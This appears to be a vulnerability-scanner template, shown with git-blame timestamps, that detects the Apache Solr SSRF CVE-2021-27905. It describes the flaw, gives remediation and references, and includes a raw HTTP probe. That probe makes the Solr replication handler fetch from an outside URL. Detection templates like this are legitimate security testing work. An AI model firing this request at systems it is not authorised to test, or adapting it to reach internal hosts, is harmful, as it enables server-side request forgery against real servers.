2021-04-23 08:44:49 +00:00
id : CVE-2021-27905
info :
2022-05-17 16:29:01 +00:00
name : Apache Solr <=8.8.1 - Server-Side Request Forgery
2021-04-23 10:08:41 +00:00
author : hackergautam
2021-09-10 11:26:40 +00:00
severity : critical
2022-05-17 16:29:01 +00:00
description : The ReplicationHandler (normally registered at "/replication" under a Solr core) in Apache Solr has a "masterUrl" (also "leaderUrl" alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the "shards" parameter.
remediation : This issue is resolved in Apache Solr 8.8.2 and later.
2021-08-18 11:37:49 +00:00
reference :
2021-08-19 14:44:46 +00:00
- https://www.anquanke.com/post/id/238201
- https://ubuntu.com/security/CVE-2021-27905
- https://nvd.nist.gov/vuln/detail/CVE-2021-27905
- https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2021-27905
cwe-id : CWE-918
2022-04-22 10:38:41 +00:00
tags : cve,cve2021,apache,solr,ssrf
2021-04-23 08:44:49 +00:00
requests :
- raw :
- |
GET /solr/admin/cores?wt=json HTTP/1.1
Host : {{Hostname}}
Accept-Language : en
Connection : close
- |
2021-04-23 10:08:41 +00:00
GET /solr/{{core}}/replication/?command=fetchindex&masterUrl=https://example.com HTTP/1.1
2021-04-23 08:44:49 +00:00
Host : {{Hostname}}
Accept-Language : en
Connection : close
extractors :
- type : regex
2021-08-09 16:28:28 +00:00
internal : true
2021-04-23 10:08:41 +00:00
name : core
2021-04-23 08:44:49 +00:00
group : 1
2021-08-09 16:28:28 +00:00
regex :
- '"name"\:"(.*?)"'
2021-04-23 08:44:49 +00:00
matchers :
2021-04-23 10:08:41 +00:00
- type : word
words :
- '<str name="status">OK</str>'
2022-05-17 16:29:01 +00:00
part : body
# Enhanced by mp on 2022/05/17